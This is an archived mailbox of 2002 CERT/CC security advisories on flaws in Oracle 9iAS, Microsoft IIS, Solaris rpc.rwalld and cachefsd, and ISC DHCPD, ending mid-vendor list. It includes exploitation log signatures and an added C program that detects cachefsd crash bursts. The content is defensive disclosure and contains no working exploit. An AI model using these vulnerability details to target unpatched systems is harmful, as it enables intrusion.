A number of vulnerabilities disclose configuration information or expose data stored in underlying databases. Also, insecure applications could allow an intruder to execute SQL queries. Oracle system programmers may wish to examine these vulnerabilities in Oracle's sample pages to prevent similar vulnerabilities in their own Oracle applications.
VU#307835 - Oracle9i Application Server OWA_UTIL PL/SQL application exposes procedures that are remotely accessible by arbitrary users
VU#193523 - Oracle 9i Application Server allows unauthenticated access to PL/SQL applications via alternate Database Access Descriptor
VU#698467 - Oracle 9iAS default configuration allows access to "globals.jsa" file
VU#476619 - Oracle 9iAS default configuration allows arbitrary users to view sensitive configuration files
VU#977251 - Oracle 9iAS XSQL Servlet ignores file permissions allowing arbitrary users to view sensitive configuration files
VU#168795 - Oracle 9iAS allows anonymous remote users to view sensitive Apache services by default
VU#278971 - Oracle 9i Application Server does not adequately handle requests for nonexistent JSP files thereby disclosing web folder path information
VU#547459 - Oracle 9iAS creates temporary files when processing JSP requests that are world-readable

Denial of service

In the case where the PL/SQL module does not properly handle an HTTP request, a denial-of-service vulnerability exists. Also, an unsuccessful attempt to exploit a buffer overflow vulnerability could crash the Apache service.

VU#805915 - Oracle9i Application Server Apache PL/SQL module does not properly handle HTTP Authorization header

III. Solution

Oracle has provided patches and workarounds that address most of these vulnerabilities. Sites using Oracle Application Server are encouraged to install the appropriate patches and make the recommended configuration changes provided by Oracle.
Solutions and workarounds for specific vulnerabilities can be found in individual vulnerability notes and in the following Oracle security alerts:

* Oracle Security Alert #29
  http://otn.oracle.com/deploy/security/pdf/plsextproc_alert.pdf
* Oracle Security Alert #28
  http://otn.oracle.com/deploy/security/pdf/ias_modplsql_alert.pdf
* Oracle Security Alert #25
  http://otn.oracle.com/deploy/security/pdf/modplsql.pdf
* Oracle Security Alert #22
  http://otn.oracle.com/deploy/security/pdf/ias_soap_alert.pdf

Security and patch information for Oracle products is available at the following locations:

* Oracle Security Alerts
  http://otn.oracle.com/deploy/security/alerts.htm
* MetaLink (registration required)
  http://metalink.oracle.com/

Sites using Oracle Application Server may also find David Litchfield's Hackproofing Oracle Application Server paper useful in describing the impacts and various interactions of these vulnerabilities.

Apply a patch

Oracle has released patches that address some of these vulnerabilities. Patch information can be found in Oracle Security Alert #28 and Oracle Security Alert #25 and on the MetaLink web site (registration required).

Secure default configuration

Oracle has provided documentation on changing vulnerable default configuration settings. For details, consult the individual Vulnerability Notes and the Oracle Security Alerts listed above.

_________________________________________________________________

The CERT Coordination Center thanks David Litchfield and Oracle for information used in this document.

_________________________________________________________________

Authors: Art Manion, Jason Rafail, and Shawn Van Ittersum

_________________________________________________________________

Appendix A. - Vendor Information

This appendix contains statements provided by vendors for this advisory. We will update this section as vendors provide new or modified statements, and we will note the changes in our revision history.
If a particular vendor is not listed below, we have not received their comments.

Appendix B. - References

1. http://www.kb.cert.org/vuls/id/500203
2. http://www.kb.cert.org/vuls/id/313280
3. http://www.kb.cert.org/vuls/id/750299
4. http://www.kb.cert.org/vuls/id/878603
5. http://www.kb.cert.org/vuls/id/659043
6. http://www.kb.cert.org/vuls/id/923395
7. http://www.kb.cert.org/vuls/id/307835
8. http://www.kb.cert.org/vuls/id/736923
9. http://www.kb.cert.org/vuls/id/611776
10. http://www.kb.cert.org/vuls/id/698467
11. http://www.kb.cert.org/vuls/id/476619
12. http://www.kb.cert.org/vuls/id/712723
13. http://www.kb.cert.org/vuls/id/168795
14. http://www.kb.cert.org/vuls/id/278971
15. http://www.kb.cert.org/vuls/id/180147
16. http://www.kb.cert.org/vuls/id/193523
17. http://www.kb.cert.org/vuls/id/977251
18. http://www.kb.cert.org/vuls/id/805915
19. http://www.kb.cert.org/vuls/id/547459
20. http://www.nextgenss.com/papers/hpoas.pdf
21. http://www.nextgenss.com/advisories/plsql.txt
22. http://www.nextgenss.com/advisories/oraplsextproc.txt
23. http://www.nextgenss.com/advisories/oraplsbos.txt
24. http://www.nextgenss.com/advisories/orajsa.txt
25. http://www.nextgenss.com/advisories/orajsp.txt
26. http://otn.oracle.com/deploy/security/pdf/plsextproc_alert.pdf
27. http://otn.oracle.com/deploy/security/pdf/ias_modplsql_alert.pdf
28. http://otn.oracle.com/deploy/security/pdf/modplsql.pdf
29. http://otn.oracle.com/deploy/security/pdf/ias_soap_alert.pdf
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2002-08.html
______________________________________________________________________
CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
  CERT Coordination Center
  Software Engineering Institute
  Carnegie Mellon University
  Pittsburgh PA 15213-3890
  U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site

http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
______________________________________________________________________
NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________
Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.
Revision History

March 14, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPJDsH6CVPMXQI2HJAQHgiwP+JCqCffr8d7JQejHAqJFiZGs8bnOsz4+k
Fw22F6K3xaZLptM8yHo8a1KDZPEgZ9q4PkCs+VzjHxZp+xkt3eASgGctZ75xUrh0
Tt5UhitcS0R6vuH3/jKJmMqaNyszxmdcndm49SxgzUNM4JnI+h4GfjO3pTGxKyqr
Ly39M389sLE=
=qEP3
-----END PGP SIGNATURE-----

From - Thu Apr 11 15:18:33 2002
Return-Path:
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g3BM71P12925; Thu, 11 Apr 2002 15:07:01 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id PAA01381; Thu, 11 Apr 2002 15:24:15 -0400 (EDT)
Date: Thu, 11 Apr 2002 15:24:15 -0400 (EDT)
Received: by canaveral.red.cert.org; Thu, 11 Apr 2002 15:18:47 -0400
Message-Id:
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: ,
List-Subscribe:
List-Unsubscribe:
List-Post: NO (posting not allowed on this list)
List-Owner:
List-Archive:
Subject: CERT Advisory CA-2002-09 Multiple Vulnerabilities in Microsoft IIS
X-Mozilla-Status: 9001
X-Mozilla-Status2: 00000000
X-UIDL: 179
Status: RO
X-Status:
X-Keywords:
X-UID: 44

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-09 Multiple Vulnerabilities in Microsoft IIS

Original release date: April 11, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Microsoft IIS 4.0, 5.0, and 5.1

Overview

A variety of vulnerabilities exist in various versions of Microsoft IIS. Some of these vulnerabilities may allow an intruder to execute arbitrary code on vulnerable systems.

I. Description

There are a variety of vulnerabilities in Microsoft IIS. Many of these vulnerabilities are buffer overflows that could permit an intruder to execute arbitrary code on vulnerable systems. We strongly encourage all sites running IIS to read Microsoft's advisory on these and other vulnerabilities and take appropriate action as soon as practical.
Microsoft's bulletin is available at

http://www.microsoft.com/technet/security/bulletin/MS02-018.asp

Additional information about these vulnerabilities is available at

http://www.kb.cert.org/vuls

VU#363715 CAN-2002-0071
  Microsoft Internet Information Server (IIS) vulnerable to heap overflow during processing of crafted ".htr" request by "ISM.DLL" ISAPI filter
VU#883091 CAN-2002-0074
  Microsoft Internet Information Server (IIS) contains cross-site scripting vulnerability in IIS Help Files search facility
VU#886699 CAN-2002-0148
  Microsoft Internet Information Server (IIS) contains cross-site scripting vulnerability in HTTP error page results
VU#520707 CAN-2002-0075
  Microsoft Internet Information Server (IIS) contains cross-site scripting vulnerability in redirect response messages
VU#412203 CAN-2002-0073
  Microsoft Internet Information Server (IIS) vulnerable to DoS via malformed FTP connection status request
VU#454091 CAN-2002-0150
  Microsoft Internet Information Server (IIS) vulnerable to buffer overflow via inaccurate checking of delimiters in HTTP header fields
VU#721963 CAN-2002-0149
  Microsoft Internet Information Server (IIS) buffer overflow in server-side includes (SSI) containing long invalid file name
VU#521059 CAN-2002-0072
  Microsoft Internet Information Server (IIS) vulnerable to DoS when URL request exceeds maximum allowed length
VU#610291 CAN-2002-0079
  Microsoft Internet Information Server (IIS) buffer overflow in chunked encoding transfer mechanism
VU#669779 CAN-2002-0147
  Microsoft Internet Information Server (IIS) buffer overflow in chunked encoding transfer mechanism

II. Impact

For many of the vulnerabilities, an intruder could execute arbitrary code with privileges that vary according to which version of IIS is running. In general, IIS 4.0 permits an intruder to execute code with complete administrative privileges, while IIS 5.0 and 5.1 permit an intruder to execute code with the privileges of the IWAM_computername account.

III.
Solution

Microsoft Corporation has released Microsoft Security Bulletin MS02-018, which announces the availability of a cumulative patch to address a variety of problems. We strongly encourage you to read this bulletin and take the appropriate corrective measures. MS02-018 is available at

http://www.microsoft.com/technet/security/bulletin/MS02-018.asp

In addition to applying the patch, or until it can be applied, we recommend the following actions:

* Use the IIS Lockdown tool and URLScan to eliminate or reduce the impact of some of these vulnerabilities; they may also eliminate or reduce other vulnerabilities that have not yet been discovered. The IIS Lockdown tool can also be used to disable ASP if it's not needed. More information about the IIS Lockdown tool and URLScan can be found at
  http://www.microsoft.com/technet/security/tools/locktool.asp
  http://www.microsoft.com/technet/security/URLScan.asp
* As Microsoft has recommended for quite some time, disable the HTR ISAPI extension unless it is absolutely required.
* Disable anonymous FTP unless it is required.
* Don't give login credentials on IIS servers to untrusted users.
_________________________________________________________________
Our thanks to Microsoft Corporation for the information contained in their advisory. Additionally, our thanks go to the various individuals and organizations whom Microsoft identified as discovering the vulnerabilities, including eEye Digital Security (http://www.eeye.com), Serge Mister of Entrust, Inc. (http://www.entrust.com), Dave Aitel of @Stake (http://www.atstake.com), Peter Grundl of KPMG, Joe Smith (jsm1th@hotmail.com) and zenomorph (admin@cgisecurity.com) of http://www.cgisecurity.com, Keigo Yamazaki of the LAC SNS Team (http://www.lac.co.jp/security/), and Thor Larholm of Jubii A/S.
_________________________________________________________________
Author: Shawn V.
Hernan
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2002-09.html
_________________________________________________________________
Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

April 11, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPLXddqCVPMXQI2HJAQG0+AP8CqkIjWiFgHY0WdWHeuDDoTt/ME76Qyxc
hIqu0JY4NYwPgHa3t28g5kT216wgIBpI3A/B4iS/d0GXACsN/NFzMbHK7oyvSauS
/ljHAfOFWsP8Uho6LQX/A9i4BV1gXDc5ThmCXormjgjcskyrQrRNRE8bSi6yY/kQ
paZ74Dil6co=
=qG95
-----END PGP SIGNATURE-----

From - Wed May 1 12:33:08 2002
Return-Path:
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g41JWBt21765; Wed, 1 May 2002 12:32:12 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA26395; Wed, 1 May 2002 14:22:54 -0400 (EDT)
Date: Wed, 1 May 2002 14:22:54 -0400 (EDT)
Received: by canaveral.red.cert.org; Wed, 1 May 2002 14:17:22 -0400
Message-Id:
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: ,
List-Subscribe:
List-Unsubscribe:
List-Post: NO (posting not allowed on this list)
List-Owner:
List-Archive:
Subject: CERT Advisory CA-2002-10 Format String Vulnerability in rpc.rwalld
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 223
Status: RO
X-Status:
X-Keywords:
X-UID: 45

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-10 Format String Vulnerability in rpc.rwalld

Original release date: May 1, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Sun Solaris 2.5.1, 2.6, 7, and 8

Overview

The rwall daemon (rpc.rwalld) is a utility that is used to listen for wall requests on the network. When a request is received, it calls wall, which sends the message to all terminals of a time-sharing system. A format string vulnerability may permit an intruder to execute code with the privileges of the rwall daemon. A proof-of-concept exploit is publicly available, but we have not seen active scanning or exploitation of this vulnerability.

I. Description

rpc.rwalld is a utility that listens for remote wall requests. Wall is used to send a message to all terminals of a time-sharing system. If the wall command cannot be executed, the rwall daemon will display an error message. An intruder can consume system resources and potentially prevent wall from executing, which would trigger the rwall daemon's error message. A format string vulnerability exists in the code that displays the error message. This vulnerability may permit the intruder to execute code with the privileges of the rwall daemon.

This vulnerability may be exploited both locally and remotely, although remote exploitation is significantly more difficult.

II. Impact

An intruder can execute code with the privileges of the rwall daemon, typically root.

III.
Solution

Apply a patch

Appendix A contains information provided by vendors for this advisory.

If a patch is not available, disable the rwall daemon (rpc.rwalld) in inetd.conf until a patch can be applied. If disabling the rwall daemon is not an option, implement a firewall to limit access to rpc.rwalld (typically port 32777/UDP). rpc.rwalld is an RPC service (program number 100008) whose port is assigned when it registers with the portmapper, so confirm the port actually in use (for example with rpcinfo -p) before writing the filter rule. Note that this will not mitigate all vectors of attack.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#638099) or contact your vendor directly.

Hewlett-Packard

HP is not vulnerable.

IBM

IBM's AIX operating system, versions 4.3.x and 5.1L, is not susceptible to the vulnerability described.

NetBSD

NetBSD has never been vulnerable to this problem.

Sun Microsystems

Sun confirms that there is a format string vulnerability in rpc.rwalld(1M) which affects Solaris 2.5.1, 2.6, 7 and 8. However, this issue relies on a combination of events, including the exhaustion of system resources, which are difficult to control by a remote user in order to be exploited. Disabling rpc.rwalld(1M) in inetd.conf(4) is the recommended workaround until patches are available. Sun is currently generating patches for this issue and will be releasing a Sun Security Bulletin once the patches are available. The bulletin will be available from:

http://sunsolve.sun.com/security

Sun patches are available from:

http://sunsolve.sun.com/securitypatch
_________________________________________________________________
The CERT Coordination Center acknowledges "GOBBLES" as the discoverer of this vulnerability and thanks Sun Microsystems for their technical information.
_________________________________________________________________
Feedback can be directed to the author: Jason A.
Rafail
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2002-10.html
_________________________________________________________________
Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

May 1, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPNAuCKCVPMXQI2HJAQFPggP8CfV9uws6+YunrdNbxwEbKKopLCFRsL1Y
Lk243wORHm3ocuWRWsqqWueaP/OuvG7lDS+0vOIsZlxUeKVZWWREUH8Lm2FMi3BB
FRPTUWmjYqi3UcywqFnnZspXM+s9jL/fpRFBH1aqhIrpodB3+7HxqWEitll5vAJ4
c0WFy5v6S9k=
=RnyP
-----END PGP SIGNATURE-----

From - Mon May 6 16:29:47 2002
Return-Path:
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g46NPhe25422; Mon, 6 May 2002 16:25:44 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA18002; Mon, 6 May 2002 16:52:19 -0400 (EDT)
Date: Mon, 6 May 2002 16:52:19 -0400 (EDT)
Received: by canaveral.red.cert.org; Mon, 6 May 2002 16:46:46 -0400
Message-Id:
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: ,
List-Subscribe:
List-Unsubscribe:
List-Post: NO (posting not allowed on this list)
List-Owner:
List-Archive:
Subject: CERT Advisory CA-2002-11 Heap Overflow in Cachefs Daemon (cachefsd)
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 240
Status: RO
X-Status:
X-Keywords:
X-UID: 46

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-11 Heap Overflow in Cachefs Daemon (cachefsd)

Original release date: May 06, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel Architectures)

Overview

Sun's NFS/RPC file system cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remotely exploitable vulnerability exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root. The CERT/CC has received credible reports of scanning and exploitation of Solaris systems running cachefsd.

I. Description

A remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the NFS protocol. A remote attacker can send a crafted RPC request to the cachefsd program to exploit the vulnerability.
Logs of exploitation attempts may resemble the following:

  May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped
  May 16 22:46:21 victim-host last message repeated 7 times
  May 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error- core dumped
  May 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped
  May 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped
  May 16 22:46:59 victim-host last message repeated 1 time
  May 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped
  May 16 22:47:07 victim-host last message repeated 3 times
  May 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup
  May 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped

According to a Sun Alert Notification, failed attempts to exploit this vulnerability may leave a core dump file in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries.

This issue is also being referenced as CAN-2002-0085:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0085

The Australian Computer Emergency Response Team has also issued an advisory related to incident activity exploiting cachefsd:

http://www.auscert.org.au/Information/Advisories/advisory/AA-2002.01.txt

II. Impact

A remote attacker may be able to execute code with the privileges of the cachefsd process, typically root.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory.

If a patch is not available, disable cachefsd in inetd.conf until a patch can be applied. If disabling the cachefsd is not an option, follow the suggested workaround in the Sun Alert Notification.

Appendix A.
- Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#635811) or contact your vendor directly.

IBM

IBM's AIX operating system, all versions, is not vulnerable.

SGI

SGI does not ship with SUN cachefsd, so IRIX is not vulnerable.

Sun

See the Sun Alert Notification available at http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309.
_________________________________________________________________
The CERT/CC acknowledges the eSecurity Online Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance.
_________________________________________________________________
Feedback can be directed to the authors: Jason A. Rafail and Jeffrey S. Havrilla
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2002-11.html
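The crash lines in the Description above are what syslog records when the cachefsd child that inetd spawned dies from a signal; syslogd also collapses identical consecutive lines into "last message repeated N times", so a plain grep for "core dumped" undercounts. The C program below is an added example, not code from CERT/CC, Sun or AusCERT: it expands those repeat markers, counts signal deaths of cachefsd and finds the densest burst inside any one-minute window. The SAMPLE_LOG array is constructed to mirror the advisory's excerpt rather than captured from a real host, and the alert threshold of five crashes per minute is an assumption.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample mirroring the advisory's excerpt; not a real capture. */
static const char *SAMPLE_LOG[] = {
    "May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped",
    "May 16 22:46:21 victim-host last message repeated 7 times",
    "May 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error- core dumped",
    "May 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped",
    "May 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped",
    "May 16 22:46:59 victim-host last message repeated 1 time",
    "May 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped",
    "May 16 22:47:07 victim-host last message repeated 3 times",
    "May 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup",
    "May 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])
#define MAX_EVENTS 4096
#define ALERT_PER_MINUTE 5   /* assumed threshold; tune to the host's baseline */

/* Seconds since midnight from the syslog "Mon DD HH:MM:SS" prefix, or -1. */
static int syslog_seconds(const char *line)
{
    int h, m, s;
    if (sscanf(line, "%*s %*d %d:%d:%d", &h, &m, &s) != 3)
        return -1;
    return h * 3600 + m * 60 + s;
}

/* inetd reporting that its cachefsd child died from a signal. "Hangup" is
 * counted too: the advisory's excerpt shows it in the middle of the run. */
static int is_cachefsd_kill(const char *line)
{
    return strstr(line, "inetd[") && strstr(line, "cachefsd:") &&
           (strstr(line, "Segmentation Fault") || strstr(line, "Bus Error") ||
            strstr(line, "Hangup"));
}

/* syslogd duplicate suppression: returns N from "last message repeated N
 * time(s)", or 0 when the line is not such a marker. */
static int repeated_count(const char *line)
{
    const char *p = strstr(line, "last message repeated ");
    return p ? atoi(p + strlen("last message repeated ")) : 0;
}

/* One timestamp per crash, re-inflating repeat markers that follow a crash
 * line (the marker's own timestamp is used for the suppressed copies). */
static size_t expand_crashes(const char **lines, size_t n, int *times, size_t max)
{
    size_t cnt = 0;
    int last_was_crash = 0;
    for (size_t i = 0; i < n; i++) {
        int t = syslog_seconds(lines[i]);
        int rep = repeated_count(lines[i]);
        if (is_cachefsd_kill(lines[i])) {
            if (cnt < max) times[cnt++] = t;
            last_was_crash = 1;
        } else if (rep > 0 && last_was_crash) {
            for (int k = 0; k < rep && cnt < max; k++) times[cnt++] = t;
        } else {
            last_was_crash = 0;   /* any other line ends the crash run */
        }
    }
    return cnt;
}

/* Total cachefsd signal deaths in the log, repeats expanded. */
int count_cachefsd_crashes(const char **lines, size_t n)
{
    int times[MAX_EVENTS];
    return (int)expand_crashes(lines, n, times, MAX_EVENTS);
}

/* Largest number of crashes inside any window_s-second span (log order is
 * assumed chronological, as syslog writes it). */
int peak_cachefsd_crashes(const char **lines, size_t n, int window_s)
{
    int times[MAX_EVENTS];
    size_t cnt = expand_crashes(lines, n, times, MAX_EVENTS);
    int peak = 0;
    for (size_t i = 0; i < cnt; i++) {
        size_t j = i;
        while (j < cnt && times[j] - times[i] <= window_s)
            j++;
        if ((int)(j - i) > peak)
            peak = (int)(j - i);
    }
    return peak;
}

int main(void)
{
    int total = count_cachefsd_crashes(SAMPLE_LOG, SAMPLE_LOG_LEN);
    int peak = peak_cachefsd_crashes(SAMPLE_LOG, SAMPLE_LOG_LEN, 60);
    printf("cachefsd signal deaths: %d (peak %d within 60 s)\n", total, peak);
    if (peak >= ALERT_PER_MINUTE)
        printf("ALERT: repeated cachefsd crashes; check for a core file in / and for odd entries in /etc/cachefstab\n");
    return 0;
}
```

Run against the ten sample lines it reports 18 signal deaths, 17 of them inside one 60-second window, which is the shape of a brute-force attempt against the heap layout rather than a single failed connection. The same expansion logic applies to any inetd-spawned service; only the "cachefsd:" match is specific to this advisory.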
Copyright 2002 Carnegie Mellon University.
Revision History

May 06, 2002: Initial release

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQCVAwUBPNbqwqCVPMXQI2HJAQHPBwP/ZElJx24KBdtWjqsaEv7qb9uFmA/5xOkc
OgCZ/6EeXiEyK+D/faHAvttarxG5jABSrUnMjXI5aqa/3CaDmrMNnUKjYfxzt1GY
TZFhLWUfE6F35sxRshLBwLmy88qkoZqLTqnWn/YqgCU+f8UUnqCIuVIxf2q1AgJj
ExjXmDs3tbQ=
=LUIX
-----END PGP SIGNATURE-----

From - Wed May 8 15:59:25 2002
Return-Path:
Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g48KOF329910; Wed, 8 May 2002 13:24:15 -0700 (PDT)
Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id NAA28573; Wed, 8 May 2002 13:34:04 -0400 (EDT)
Date: Wed, 8 May 2002 13:34:04 -0400 (EDT)
Received: by canaveral.red.cert.org; Wed, 8 May 2002 13:26:56 -0400
Message-Id:
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
List-Help: ,
List-Subscribe:
List-Unsubscribe:
List-Post: NO (posting not allowed on this list)
List-Owner:
List-Archive:
Subject: CERT Advisory CA-2002-12 Format String Vulnerability in ISC DHCPD
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 246
Status: RO
X-Status:
X-Keywords:
X-UID: 47

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-2002-12 Format String Vulnerability in ISC DHCPD

Original release date: May 8, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* ISC DHCPD 3.0 to 3.0.1rc8 inclusive

Overview

The Internet Software Consortium (ISC) provides a Dynamic Host Configuration Protocol Daemon (DHCPD), which is a server that is used to allocate network addresses and assign configuration parameters to hosts. A format string vulnerability may permit a remote attacker to execute code with the privileges of the DHCPD (typically root). We have not seen active scanning or exploitation of this vulnerability.

I. Description

ISC's DHCPD listens for requests from client machines connecting to the network. Versions 3 to 3.0.1rc8 (inclusive) of DHCPD contain an option (NSUPDATE) that is enabled by default. NSUPDATE allows the DHCP server to send information about the host to the DNS server after processing a DHCP request. The DNS server responds by sending an acknowledgement message back to the DHCP server that may contain user-supplied data (like a host name). When the DHCP server receives the acknowledgement message from the DNS server, it logs the transaction.

A format string vulnerability exists in ISC's DHCPD code that logs the transaction. This vulnerability may permit a remote attacker to execute code with the privileges of the DHCP daemon.

II. Impact

A remote attacker may be able to execute code with the privileges of the DHCPD (typically root).

III.
Solution

Note that some of the mitigation steps recommended below may have significant impact on your normal network operations. Ensure that any changes made based on the following recommendations will not unacceptably affect any of your operations.

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory.

Disable the DHCP service

As a general rule, the CERT/CC recommends disabling any service or capability that is not explicitly required. Depending on your network configuration, you may not need to use DHCP.

Ingress filtering

As a temporary measure, it may be possible to limit the scope of this vulnerability by blocking access to DHCP services at the network perimeter. Ingress filtering manages the flow of traffic as it enters a network under your administrative control. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound traffic to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services. For DHCP, ingress filtering of the following ports can prevent attackers outside of your network from reaching vulnerable devices in the local network that are not explicitly authorized to provide public DHCP services.

  bootps  67/tcp  # Bootstrap Protocol Server
  bootps  67/udp  # Bootstrap Protocol Server
  bootpc  68/tcp  # Bootstrap Protocol Client
  bootpc  68/udp  # Bootstrap Protocol Client

Note that this restricts only who can reach the DHCP server from outside. As described in Section I, the data that reaches the vulnerable logging code is a host name supplied by a DHCP client and returned by the DNS server in its acknowledgement, so it can still be supplied from the local network; perimeter filtering is no substitute for the patch.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, please check the Vulnerability Note (VU#854315) or contact your vendor directly.

Alcatel

The security of our customers' networks is of highest priority for Alcatel.
Alcatel is aware of this security issue in the DHCP implementation of ISC and has put measures in place to assess which of its products might be affected and to apply the necessary fixes where required. An update will be shortly published to provide more details on any affected products.

Conectiva

Conectiva Linux 8 ships dhcp-3.0 and is vulnerable to this problem. Updates will be available at our ftp site and an announcement will be sent to our mailing lists as soon as CERT publishes its advisory.

F5 Networks, Inc.

F5 Networks' products do not include any affected version of ISC's DHCPD, and are therefore not vulnerable.

FreeBSD

The FreeBSD base system does not ship with the ISC dhcpd server by default and is not affected by this vulnerability. The ISC dhcpd server is available in the FreeBSD Ports Collection; updates to the ISC dhcp port (ports/net/isc-dhcp3) are in progress and corrected packages will be available in the near future.

IBM

IBM's AIX operating system, all versions, is not vulnerable.

Internet Software Consortium

